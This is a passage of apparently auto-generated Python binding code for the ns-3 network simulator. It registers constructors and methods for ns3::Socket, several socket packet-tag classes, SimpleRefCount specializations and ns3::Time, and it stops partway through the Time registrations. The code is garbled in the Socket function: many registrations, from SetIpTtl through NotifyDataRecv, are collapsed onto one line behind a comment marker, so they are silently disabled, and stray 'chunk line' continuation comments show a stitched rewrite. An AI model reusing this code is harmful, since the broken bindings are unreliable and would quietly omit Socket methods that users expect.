def register_Ns3SimpleRefCount__Ns3Packet_Ns3Empty_Ns3DefaultDeleter__lt__ns3Packet__gt___methods(root_module, cls):
    """Register bindings for the ns3::SimpleRefCount< ns3::Packet > specialization."""
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >::SimpleRefCount() [constructor]
    cls.add_constructor([])
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >::SimpleRefCount(ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> > const & o) [copy constructor]
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::Packet, ns3::empty, ns3::DefaultDeleter< ns3::Packet > > const &', 'o')])
    ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >::Cleanup() [member function]
    cls.add_method('Cleanup', 'void', [], is_static=True)
    return

def register_Ns3SimpleRefCount__Ns3QueueItem_Ns3Empty_Ns3DefaultDeleter__lt__ns3QueueItem__gt___methods(root_module, cls):
    """Register bindings for the ns3::SimpleRefCount< ns3::QueueItem > specialization."""
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::QueueItem, ns3::empty, ns3::DefaultDeleter<ns3::QueueItem> >::SimpleRefCount() [constructor]
    cls.add_constructor([])
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::QueueItem, ns3::empty, ns3::DefaultDeleter<ns3::QueueItem> >::SimpleRefCount(ns3::SimpleRefCount<ns3::QueueItem, ns3::empty, ns3::DefaultDeleter<ns3::QueueItem> > const & o) [copy constructor]
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::QueueItem, ns3::empty, ns3::DefaultDeleter< ns3::QueueItem > > const &', 'o')])
    ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::QueueItem, ns3::empty, ns3::DefaultDeleter<ns3::QueueItem> >::Cleanup() [member function]
    cls.add_method('Cleanup', 'void', [], is_static=True)
    return

def register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, cls):
    """Register bindings for the ns3::SimpleRefCount< ns3::TraceSourceAccessor > specialization."""
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::SimpleRefCount() [constructor]
    cls.add_constructor([])
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > const & o) [copy constructor]
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter< ns3::TraceSourceAccessor > > const &', 'o')])
    ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::Cleanup() [member function]
    cls.add_method('Cleanup', 'void', [], is_static=True)
    return

def register_Ns3Socket_methods(root_module, cls):
    """Register Python bindings for the methods of the C++ class ns3::Socket.

    NOTE(review): this function continues past the end of this file chunk;
    the registrations below are only the portion visible here.
    """
    ## socket.h (module 'network'): ns3::Socket::Socket(ns3::Socket const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::Socket const &', 'arg0')])
    ## socket.h (module 'network'): ns3::Socket::Socket() [constructor]
    cls.add_constructor([])
    ## socket.h (module 'network'): int ns3::Socket::Bind(ns3::Address const & address) [member function]
    cls.add_method('Bind', 'int', [param('ns3::Address const &', 'address')], is_pure_virtual=True, is_virtual=True)
    ## socket.h (module 'network'): int ns3::Socket::Bind() [member function]
    cls.add_method('Bind', 'int', [], is_pure_virtual=True, is_virtual=True)
    ## socket.h (module 'network'): int ns3::Socket::Bind6() [member function]
    cls.add_method('Bind6', 'int', [], is_pure_virtual=True, is_virtual=True)
    ## socket.h (module 'network'): void ns3::Socket::BindToNetDevice(ns3::Ptr<ns3::NetDevice> netdevice) [member function]
    cls.add_method('BindToNetDevice', 'void', [param('ns3::Ptr< ns3::NetDevice >', 'netdevice')], is_virtual=True)
    ## socket.h (module 'network'): int ns3::Socket::Close() [member function]
    cls.add_method('Close', 'int', [], is_pure_virtual=True, is_virtual=True)
    ## socket.h (module 'network'): int ns3::Socket::Connect(ns3::Address const & address) [member function]
    cls.add_method('Connect', 'int', [param('ns3::Address const &', 'address')], is_pure_virtual=True, is_virtual=True)
    ## socket.h (module 'network'): static ns3::Ptr<ns3::Socket> ns3::Socket::CreateSocket(ns3::Ptr<ns3::Node> node, ns3::TypeId tid) [member function]
    cls.add_method('CreateSocket', 'ns3::Ptr< ns3::Socket >', [param('ns3::Ptr< ns3::Node >', 'node'), param('ns3::TypeId', 'tid')], is_static=True)
    ## socket.h (module 'network'): bool ns3::Socket::GetAllowBroadcast() const [member function]
    cls.add_method('GetAllowBroadcast', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    ## socket.h (module 'network'): ns3::Ptr<ns3::NetDevice> ns3::Socket::GetBoundNetDevice() [member function]
    cls.add_method('GetBoundNetDevice', 'ns3::Ptr< ns3::NetDevice >', [])
    ## socket.h (module 'network'): ns3::Socket::SocketErrno ns3::Socket::GetErrno() const [member function]
    cls.add_method('GetErrno', 'ns3::Socket::SocketErrno', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    ## socket.h (module 'network'): uint8_t ns3::Socket::GetIpTos() const [member function]
    cls.add_method('GetIpTos', 'uint8_t', [], is_const=True)
    ## socket.h (module 'network'): uint8_t ns3::Socket::GetIpTtl() const [member function]
    cls.add_method('GetIpTtl', 'uint8_t', [], is_const=True, is_virtual=True)
    ## socket.h (module 'network'): uint8_t ns3::Socket::GetIpv6HopLimit() const [member function]
    cls.add_method('GetIpv6HopLimit', 'uint8_t', [], is_const=True, is_virtual=True)
    ## socket.h (module 'network'): uint8_t ns3::Socket::GetIpv6Tclass() const [member function]
    cls.add_method('GetIpv6Tclass', 'uint8_t', [], is_const=True)
    ## socket.h (module 'network'): ns3::Ptr<ns3::Node> ns3::Socket::GetNode() const [member function]
    cls.add_method('GetNode', 'ns3::Ptr< ns3::Node >', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    ## socket.h (module 'network'): int ns3::Socket::GetPeerName(ns3::Address & address) const [member function]
    cls.add_method('GetPeerName', 'int', [param('ns3::Address &', 'address')], is_pure_virtual=True, is_const=True, is_virtual=True)
    ## socket.h (module 'network'): uint8_t ns3::Socket::GetPriority() const [member function]
    cls.add_method('GetPriority', 'uint8_t', [], is_const=True)
    ## socket.h (module 'network'): uint32_t ns3::Socket::GetRxAvailable() const [member function]
    cls.add_method('GetRxAvailable', 'uint32_t', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    ## socket.h (module 'network'): int ns3::Socket::GetSockName(ns3::Address & address) const [member function]
    cls.add_method('GetSockName', 'int', [param('ns3::Address &', 'address')], is_pure_virtual=True, is_const=True, is_virtual=True)
    ## socket.h (module 'network'): ns3::Socket::SocketType ns3::Socket::GetSocketType() const [member function]
    cls.add_method('GetSocketType', 'ns3::Socket::SocketType', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    ## socket.h (module 'network'): uint32_t ns3::Socket::GetTxAvailable() const [member function]
    cls.add_method('GetTxAvailable', 'uint32_t', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    ## socket.h (module 'network'): static ns3::TypeId ns3::Socket::GetTypeId() [member function]
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    ## socket.h (module 'network'): static uint8_t ns3::Socket::IpTos2Priority(uint8_t ipTos) [member function]
    cls.add_method('IpTos2Priority', 'uint8_t', [param('uint8_t', 'ipTos')], is_static=True)
    ## socket.h (module 'network'): void ns3::Socket::Ipv6JoinGroup(ns3::Ipv6Address address, ns3::Socket::Ipv6MulticastFilterMode filterMode, std::vector<ns3::Ipv6Address,std::allocator<ns3::Ipv6Address> > sourceAddresses) [member function]
    cls.add_method('Ipv6JoinGroup', 'void', [param('ns3::Ipv6Address', 'address'), param('ns3::Socket::Ipv6MulticastFilterMode', 'filterMode'), param('std::vector< ns3::Ipv6Address >', 'sourceAddresses')], is_virtual=True)
    ## socket.h (module 'network'): void ns3::Socket::Ipv6JoinGroup(ns3::Ipv6Address address) [member function]
    cls.add_method('Ipv6JoinGroup', 'void', [param('ns3::Ipv6Address', 'address')], is_virtual=True)
    ## socket.h (module 'network'): void ns3::Socket::Ipv6LeaveGroup() [member function]
    cls.add_method('Ipv6LeaveGroup', 'void', [], is_virtual=True)
    ## socket.h (module 'network'): bool ns3::Socket::IsIpRecvTos() const [member function]
    cls.add_method('IsIpRecvTos', 'bool', [], is_const=True)
    ## socket.h (module 'network'): bool ns3::Socket::IsIpRecvTtl() const [member function]
    cls.add_method('IsIpRecvTtl', 'bool', [], is_const=True)
    ## socket.h (module 'network'): bool ns3::Socket::IsIpv6RecvHopLimit() const [member function]
    cls.add_method('IsIpv6RecvHopLimit', 'bool', [], is_const=True)
    ## socket.h (module 'network'): bool ns3::Socket::IsIpv6RecvTclass() const [member function]
    cls.add_method('IsIpv6RecvTclass', 'bool', [], is_const=True)
    ## socket.h (module 'network'): bool ns3::Socket::IsRecvPktInfo() const [member function]
    cls.add_method('IsRecvPktInfo', 'bool', [], is_const=True)
    ## socket.h (module 'network'): int ns3::Socket::Listen() [member function]
    cls.add_method('Listen', 'int', [], is_pure_virtual=True, is_virtual=True)
    ## socket.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Socket::Recv(uint32_t maxSize, uint32_t flags) [member function]
    cls.add_method('Recv', 'ns3::Ptr< ns3::Packet >', [param('uint32_t', 'maxSize'), param('uint32_t', 'flags')], is_pure_virtual=True, is_virtual=True)
    ## socket.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Socket::Recv() [member function]
    cls.add_method('Recv', 'ns3::Ptr< ns3::Packet >', [])
    ## socket.h (module 'network'): int ns3::Socket::Recv(uint8_t * buf, uint32_t size, uint32_t flags) [member function]
    cls.add_method('Recv', 'int', [param('uint8_t *', 'buf'), param('uint32_t', 'size'), param('uint32_t', 'flags')])
    ## socket.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Socket::RecvFrom(uint32_t maxSize, uint32_t flags, ns3::Address & fromAddress) [member function]
    cls.add_method('RecvFrom', 'ns3::Ptr< ns3::Packet >', [param('uint32_t', 'maxSize'), param('uint32_t', 'flags'), param('ns3::Address &', 'fromAddress')], is_pure_virtual=True, is_virtual=True)
    ## socket.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Socket::RecvFrom(ns3::Address & fromAddress) [member function]
    cls.add_method('RecvFrom', 'ns3::Ptr< ns3::Packet >', [param('ns3::Address &', 'fromAddress')])
    ## socket.h (module 'network'): int ns3::Socket::RecvFrom(uint8_t * buf, uint32_t size, uint32_t flags, ns3::Address & fromAddress) [member function]
    cls.add_method('RecvFrom', 'int', [param('uint8_t *', 'buf'), param('uint32_t', 'size'), param('uint32_t', 'flags'), param('ns3::Address &', 'fromAddress')])
    ## socket.h (module 'network'): int ns3::Socket::Send(ns3::Ptr<ns3::Packet> p, uint32_t flags) [member function]
    cls.add_method('Send', 'int', [param('ns3::Ptr< ns3::Packet >', 'p'), param('uint32_t', 'flags')], is_pure_virtual=True, is_virtual=True)
    ## socket.h (module 'network'): int ns3::Socket::Send(ns3::Ptr<ns3::Packet> p) [member function]
    cls.add_method('Send', 'int', [param('ns3::Ptr< ns3::Packet >', 'p')])
    ## socket.h (module 'network'): int ns3::Socket::Send(uint8_t const * buf, uint32_t size, uint32_t flags) [member function]
    cls.add_method('Send', 'int', [param('uint8_t const *', 'buf'), param('uint32_t', 'size'), param('uint32_t', 'flags')])
    ## socket.h (module 'network'): int ns3::Socket::SendTo(ns3::Ptr<ns3::Packet> p, uint32_t flags, ns3::Address const & toAddress) [member function]
    cls.add_method('SendTo', 'int', [param('ns3::Ptr< ns3::Packet >', 'p'), param('uint32_t', 'flags'), param('ns3::Address const &', 'toAddress')], is_pure_virtual=True, is_virtual=True)
    ## socket.h (module 'network'): int ns3::Socket::SendTo(uint8_t const * buf, uint32_t size, uint32_t flags, ns3::Address const & address) [member function]
    cls.add_method('SendTo', 'int', [param('uint8_t const *', 'buf'), param('uint32_t', 'size'), param('uint32_t', 'flags'), param('ns3::Address const &', 'address')])
    ## socket.h (module 'network'): void ns3::Socket::SetAcceptCallback(ns3::Callback<bool, ns3::Ptr<ns3::Socket>, ns3::Address const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> connectionRequest, ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::Address const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> newConnectionCreated) [member function]
    cls.add_method('SetAcceptCallback', 'void', [param('ns3::Callback< bool, ns3::Ptr< ns3::Socket >, ns3::Address const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'connectionRequest'), param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::Address const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'newConnectionCreated')])
    ## socket.h (module 'network'): bool ns3::Socket::SetAllowBroadcast(bool allowBroadcast) [member function]
    cls.add_method('SetAllowBroadcast', 'bool', [param('bool', 'allowBroadcast')], is_pure_virtual=True, is_virtual=True)
    ## socket.h (module 'network'): void ns3::Socket::SetCloseCallbacks(ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> normalClose, ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> errorClose) [member function]
    cls.add_method('SetCloseCallbacks', 'void', [param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'normalClose'), param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'errorClose')])
    ## socket.h (module 'network'): void ns3::Socket::SetConnectCallback(ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> connectionSucceeded, ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> connectionFailed) [member function]
    cls.add_method('SetConnectCallback', 'void', [param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'connectionSucceeded'), param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'connectionFailed')])
    ## socket.h (module 'network'): void ns3::Socket::SetDataSentCallback(ns3::Callback<void, ns3::Ptr<ns3::Socket>, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> dataSent) [member function]
    cls.add_method('SetDataSentCallback', 'void', [param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'dataSent')])
    ## socket.h (module 'network'): void ns3::Socket::SetIpRecvTos(bool ipv4RecvTos) [member function]
    cls.add_method('SetIpRecvTos', 'void', [param('bool', 'ipv4RecvTos')])
    ## socket.h (module 'network'): void ns3::Socket::SetIpRecvTtl(bool ipv4RecvTtl) [member function]
    cls.add_method('SetIpRecvTtl', 'void', [param('bool', 'ipv4RecvTtl')])
    ## socket.h (module 'network'): void ns3::Socket::SetIpTos(uint8_t ipTos) [member function]
    cls.add_method('SetIpTos', 'void',
[param('uint8_t', 'ipTos')]) ## socket.h (module 'network'): void ns3::Socket::SetIpTtl(uint8_t ipTtl) [member function] cls.add_method('SetIpTtl', 'void', [param('uint8_t', 'ipTtl')], is_virtual=True) ## socket.h (module 'network'): void ns3::Socket::SetIpv6HopLimit(uint8_t ipHopLimit) [member function] cls.add_method('SetIpv6HopLimit', 'void', [param('uint8_t', 'ipHopLimit')], is_virtual=True) ## socket.h (module 'network'): void ns3::Socket::SetIpv6RecvHopLimit(bool ipv6RecvHopLimit) [member function] cls.add_method('SetIpv6RecvHopLimit', 'void', [param('bool', 'ipv6RecvHopLimit')]) ## socket.h (module 'network'): void ns3::Socket::SetIpv6RecvTclass(bool ipv6RecvTclass) [member function] cls.add_method('SetIpv6RecvTclass', 'void', [param('bool', 'ipv6RecvTclass')]) ## socket.h (module 'network'): void ns3::Socket::SetIpv6Tclass(int ipTclass) [member function] cls.add_method('SetIpv6Tclass', 'void', [param('int', 'ipTclass')]) ## socket.h (module 'network'): void ns3::Socket::SetPriority(uint8_t priority) [member function] cls.add_method('SetPriority', 'void', [param('uint8_t', 'priority')]) ## socket.h (module 'network'): void ns3::Socket::SetRecvCallback(ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> arg0) [member function] cls.add_method('SetRecvCallback', 'void', [param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'arg0')]) ## socket.h (module 'network'): void ns3::Socket::SetRecvPktInfo(bool flag) [member function] cls.add_method('SetRecvPktInfo', 'void', [param('bool', 'flag')]) ## socket.h (module 'network'): void ns3::Socket::SetSendCallback(ns3::Callback<void, ns3::Ptr<ns3::Socket>, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> sendCb) [member function] cls.add_method('SetSendCallback', 'void', 
[param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'sendCb')]) ## socket.h (module 'network'): int ns3::Socket::ShutdownRecv() [member function] cls.add_method('ShutdownRecv', 'int', [], is_pure_virtual=True, is_virtual=True) ## socket.h (module 'network'): int ns3::Socket::ShutdownSend() [member function] cls.add_method('ShutdownSend', 'int', [], is_pure_virtual=True, is_virtual=True) ## socket.h (module 'network'): void ns3::Socket::DoDispose() [member function] cls.add_method('DoDispose', 'void', [], visibility='protected', is_virtual=True) ## socket.h (module 'network'): bool ns3::Socket::IsManualIpTtl() const [member function] cls.add_method('IsManualIpTtl', 'bool', [], is_const=True, visibility='protected') ## socket.h (module 'network'): bool ns3::Socket::IsManualIpv6HopLimit() const [member function] cls.add_method('IsManualIpv6HopLimit', 'bool', [], is_const=True, visibility='protected') ## socket.h (module 'network'): bool ns3::Socket::IsManualIpv6Tclass() const [member function] cls.add_method('IsManualIpv6Tclass', 'bool', [], is_const=True, visibility='protected') ## socket.h (module 'network'): void ns3::Socket::NotifyConnectionFailed() [member function] cls.add_method('NotifyConnectionFailed', 'void', [], visibility='protected') ## socket.h (module 'network'): bool ns3::Socket::NotifyConnectionRequest(ns3::Address const & from) [member function] cls.add_method('NotifyConnectionRequest', 'bool', [param('ns3::Address const &', 'from')], visibility='protected') ## socket.h (module 'network'): void ns3::Socket::NotifyConnectionSucceeded() [member function] cls.add_method('NotifyConnectionSucceeded', 'void', [], visibility='protected') ## socket.h (module 'network'): void ns3::Socket::NotifyDataRecv() [member function] cls.add_method('NotifyDataRecv', 'void', [], visibility='protected') ## socket.h (module 'network'): void 
    # --- continuation of register_Ns3Socket_methods (its `def` is above this chunk) ---
    # Protected notification hooks that subclasses use to fire the user callbacks.
    cls.add_method('NotifyDataSent', 'void', [param('uint32_t', 'size')], visibility='protected')
    cls.add_method('NotifyErrorClose', 'void', [], visibility='protected')
    cls.add_method('NotifyNewConnectionCreated', 'void', [param('ns3::Ptr< ns3::Socket >', 'socket'), param('ns3::Address const &', 'from')], visibility='protected')
    cls.add_method('NotifyNormalClose', 'void', [], visibility='protected')
    cls.add_method('NotifySend', 'void', [param('uint32_t', 'spaceAvailable')], visibility='protected')
    return

def register_Ns3SocketIpTosTag_methods(root_module, cls):
    """Register the ns3::SocketIpTosTag bindings (socket.h, module 'network').

    Generated PyBindGen registration: adds the C++ constructors and methods
    of SocketIpTosTag (a packet Tag carrying the IP TOS byte) to `cls`.
    """
    # Copy constructor, then the default constructor.
    cls.add_constructor([param('ns3::SocketIpTosTag const &', 'arg0')])
    cls.add_constructor([])
    # ns3::Tag serialization interface (virtual overrides).
    cls.add_method('Deserialize', 'void', [param('ns3::TagBuffer', 'i')], is_virtual=True)
    cls.add_method('GetInstanceTypeId', 'ns3::TypeId', [], is_const=True, is_virtual=True)
    cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True, is_virtual=True)
    cls.add_method('GetTos', 'uint8_t', [], is_const=True)
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True, is_virtual=True)
    cls.add_method('Serialize', 'void', [param('ns3::TagBuffer', 'i')], is_const=True, is_virtual=True)
    cls.add_method('SetTos', 'void', [param('uint8_t', 'tos')])
    return

def register_Ns3SocketIpTtlTag_methods(root_module, cls):
    """Register the ns3::SocketIpTtlTag bindings (socket.h, module 'network').

    Generated PyBindGen registration for the packet Tag carrying the IPv4 TTL.
    """
    cls.add_constructor([param('ns3::SocketIpTtlTag const &', 'arg0')])
    cls.add_constructor([])
    cls.add_method('Deserialize', 'void', [param('ns3::TagBuffer', 'i')], is_virtual=True)
    cls.add_method('GetInstanceTypeId', 'ns3::TypeId', [], is_const=True, is_virtual=True)
    cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True, is_virtual=True)
    cls.add_method('GetTtl', 'uint8_t', [], is_const=True)
    # NOTE: this function continues on the next chunk line (GetTypeId, Print, Serialize, SetTtl, return).
    # --- continuation of register_Ns3SocketIpTtlTag_methods (started on the previous chunk line) ---
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True, is_virtual=True)
    cls.add_method('Serialize', 'void', [param('ns3::TagBuffer', 'i')], is_const=True, is_virtual=True)
    cls.add_method('SetTtl', 'void', [param('uint8_t', 'ttl')])
    return

def register_Ns3SocketIpv6HopLimitTag_methods(root_module, cls):
    """Register the ns3::SocketIpv6HopLimitTag bindings (socket.h, module 'network').

    Generated PyBindGen registration for the packet Tag carrying the IPv6 hop limit.
    """
    cls.add_constructor([param('ns3::SocketIpv6HopLimitTag const &', 'arg0')])
    cls.add_constructor([])
    cls.add_method('Deserialize', 'void', [param('ns3::TagBuffer', 'i')], is_virtual=True)
    cls.add_method('GetHopLimit', 'uint8_t', [], is_const=True)
    cls.add_method('GetInstanceTypeId', 'ns3::TypeId', [], is_const=True, is_virtual=True)
    cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True, is_virtual=True)
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True, is_virtual=True)
    cls.add_method('Serialize', 'void', [param('ns3::TagBuffer', 'i')], is_const=True, is_virtual=True)
    cls.add_method('SetHopLimit', 'void', [param('uint8_t', 'hopLimit')])
    return

def register_Ns3SocketIpv6TclassTag_methods(root_module, cls):
    """Register the ns3::SocketIpv6TclassTag bindings (socket.h, module 'network').

    Generated PyBindGen registration for the packet Tag carrying the IPv6 traffic class.
    """
    cls.add_constructor([param('ns3::SocketIpv6TclassTag const &', 'arg0')])
    cls.add_constructor([])
    cls.add_method('Deserialize', 'void', [param('ns3::TagBuffer', 'i')], is_virtual=True)
    cls.add_method('GetInstanceTypeId', 'ns3::TypeId', [], is_const=True, is_virtual=True)
    cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True, is_virtual=True)
    cls.add_method('GetTclass', 'uint8_t', [], is_const=True)
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    # NOTE: this function continues on the next chunk line (Print, Serialize, SetTclass, return).
    # --- continuation of register_Ns3SocketIpv6TclassTag_methods (started on the previous chunk line) ---
    cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True, is_virtual=True)
    cls.add_method('Serialize', 'void', [param('ns3::TagBuffer', 'i')], is_const=True, is_virtual=True)
    cls.add_method('SetTclass', 'void', [param('uint8_t', 'tclass')])
    return

def register_Ns3SocketPriorityTag_methods(root_module, cls):
    """Register the ns3::SocketPriorityTag bindings (socket.h, module 'network').

    Generated PyBindGen registration for the packet Tag carrying the socket priority.
    """
    cls.add_constructor([param('ns3::SocketPriorityTag const &', 'arg0')])
    cls.add_constructor([])
    cls.add_method('Deserialize', 'void', [param('ns3::TagBuffer', 'i')], is_virtual=True)
    cls.add_method('GetInstanceTypeId', 'ns3::TypeId', [], is_const=True, is_virtual=True)
    cls.add_method('GetPriority', 'uint8_t', [], is_const=True)
    cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True, is_virtual=True)
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True, is_virtual=True)
    cls.add_method('Serialize', 'void', [param('ns3::TagBuffer', 'i')], is_const=True, is_virtual=True)
    cls.add_method('SetPriority', 'void', [param('uint8_t', 'priority')])
    return

def register_Ns3SocketSetDontFragmentTag_methods(root_module, cls):
    """Register the ns3::SocketSetDontFragmentTag bindings (socket.h, module 'network').

    Generated PyBindGen registration for the Tag that toggles the IP "don't fragment" bit.
    """
    cls.add_constructor([param('ns3::SocketSetDontFragmentTag const &', 'arg0')])
    cls.add_constructor([])
    cls.add_method('Deserialize', 'void', [param('ns3::TagBuffer', 'i')], is_virtual=True)
    # Enable/Disable flip the don't-fragment flag carried by the tag.
    cls.add_method('Disable', 'void', [])
    cls.add_method('Enable', 'void', [])
    cls.add_method('GetInstanceTypeId', 'ns3::TypeId', [], is_const=True, is_virtual=True)
    cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True, is_virtual=True)
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    # NOTE: this function continues on the next chunk line (IsEnabled, Print, Serialize, return).
    # --- continuation of register_Ns3SocketSetDontFragmentTag_methods (started on the previous chunk line) ---
    cls.add_method('IsEnabled', 'bool', [], is_const=True)
    cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True, is_virtual=True)
    cls.add_method('Serialize', 'void', [param('ns3::TagBuffer', 'i')], is_const=True, is_virtual=True)
    return

def register_Ns3Time_methods(root_module, cls):
    """Register the ns3::Time bindings (nstime.h, module 'core').

    Generated PyBindGen registration: operators, the full family of numeric
    constructors, and the accessor/conversion methods of ns3::Time.
    """
    # Arithmetic operators: Time scales by int64, adds/subtracts another Time.
    cls.add_binary_numeric_operator('*', root_module['ns3::Time'], root_module['ns3::Time'], param('int64_t const &', u'right'))
    cls.add_binary_numeric_operator('+', root_module['ns3::Time'], root_module['ns3::Time'], param('ns3::Time const &', u'right'))
    cls.add_binary_numeric_operator('-', root_module['ns3::Time'], root_module['ns3::Time'], param('ns3::Time const &', u'right'))
    cls.add_binary_numeric_operator('/', root_module['ns3::Time'], root_module['ns3::Time'], param('int64_t const &', u'right'))
    cls.add_binary_comparison_operator('<')
    cls.add_binary_comparison_operator('>')
    cls.add_binary_comparison_operator('!=')
    cls.add_inplace_numeric_operator('+=', param('ns3::Time const &', u'right'))
    cls.add_inplace_numeric_operator('-=', param('ns3::Time const &', u'right'))
    cls.add_output_stream_operator()
    cls.add_binary_comparison_operator('<=')
    cls.add_binary_comparison_operator('==')
    cls.add_binary_comparison_operator('>=')
    # Constructors: default, copy, and one per supported numeric/string representation.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::Time const &', 'o')])
    cls.add_constructor([param('double', 'v')])
    cls.add_constructor([param('int', 'v')])
    cls.add_constructor([param('long int', 'v')])
    cls.add_constructor([param('long long int', 'v')])
    cls.add_constructor([param('unsigned int', 'v')])
    cls.add_constructor([param('long unsigned int', 'v')])
    cls.add_constructor([param('long long unsigned int', 'v')])
    cls.add_constructor([param('ns3::int64x64_t const &', 'v')])
    cls.add_constructor([param('std::string const &', 's')])
    # Unit-aware conversion helpers.
    cls.add_method('As', 'ns3::TimeWithUnit', [param('ns3::Time::Unit const', 'unit')], is_const=True)
    cls.add_method('Compare', 'int', [param('ns3::Time const &', 'o')], is_const=True)
    cls.add_method('From', 'ns3::Time', [param('ns3::int64x64_t const &', 'value')], is_static=True)
    cls.add_method('From', 'ns3::Time', [param('ns3::int64x64_t const &', 'value'), param('ns3::Time::Unit', 'unit')], is_static=True)
    cls.add_method('FromDouble', 'ns3::Time', [param('double', 'value'), param('ns3::Time::Unit', 'unit')], is_static=True)
